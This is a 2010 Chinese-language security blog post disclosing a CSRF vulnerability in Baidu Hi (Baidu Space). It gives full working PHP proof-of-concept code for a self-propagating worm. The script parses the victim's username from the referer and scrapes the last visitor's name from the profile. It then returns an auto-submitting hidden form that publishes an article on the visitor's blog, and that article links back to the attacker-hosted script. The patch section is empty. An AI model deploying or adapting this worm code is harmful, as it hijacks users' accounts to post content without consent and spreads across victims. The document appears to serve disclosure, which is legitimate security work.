Baidu Hi CSRF Bug

Author: menzhi007
Blog: http://hi.baidu.com/menzhi007
Team: http://www.80vul.com
date: 2010年5月13日

一 分析

百度空间未严格验证referer,且其token验证失效,从而引发CSRF漏洞。结合其浏览访客记录,可引发CSRF蠕虫。

二 利用

当百度空间用户浏览某页面地址时,误点击某超链接(或图片等),如<a href=http://www.l4mp.org/lab/pdf.php>Hi</a>,pdf.php用来截取其referer中的用户名,然后发送请求获取该用户名首页的最后一位浏览访客记录,并利用CSRF提交发布同样一篇文章,从而引发蠕虫。

示例代码:

<?php
$referer = $_SERVER[‘HTTP_REFERER’];
preg_match("/http:\/\/hi\.baidu\.com\/([a-z0-9_%]+)\/blog/i",$referer,$sitename);
$result = get_data("hi.baidu.com","/".$sitename[1]);

//preg_match("/\[\"(([a-z0-9_%])+)\"\,\"[a-z0-9_%]+\"\,\"/i",$result,$match_valid);
preg_match("/<a href=\"\/([a-z0-9_%]+)\" target=\"_blank\" class=\"ucard\"/i",$result,$match);

if(!empty($match[1])&&!empty($sitename[1])) {

$show= ‘<body onload="document.form1.submit();">
<form name="form1" id="popFormSubmit" action=" http://hi.baidu.com/’.$match[1].’/commit" method="post" >
<input type="hidden" name="bdstoken" value="menzhi007">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" name="spBlogID" >
<input type="hidden" name="spBlogCatName" value="默认分类">
<input id="edithid" name="edithid" type="hidden">
<input type="hidden" name="spRefURL" id="spRefURL">
<input type="hidden" name="spBlogTitle" value="Hi menzhi007">
<input type="hidden" name="spBlogText" value="Hi Hero!<br>参考: <a href=http://www.l4mp.org/lab/pdf.php>http://www.l4mp.org/lab/pdf</a>">
<input type="hidden" name="spBlogCatName" value="%C4%AC%C8%CF%B7%D6%C0%E0">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spShareNotAllow" value="0">
<input type="hidden" name="spVcode">
<input type="hidden" name="spVerifyKey">
<input name="tj" type="submit" value=" 发表文章 " >
</form>
</body>’;
echo $show;

} else {
echo "Hi";
}
function get_data($host,$path) {

    $cmd = ”;
    $data = "GET ".$path."  HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;

$fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = ”;

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;

}

?>

三 补丁

发表评论?

0 条评论。

发表评论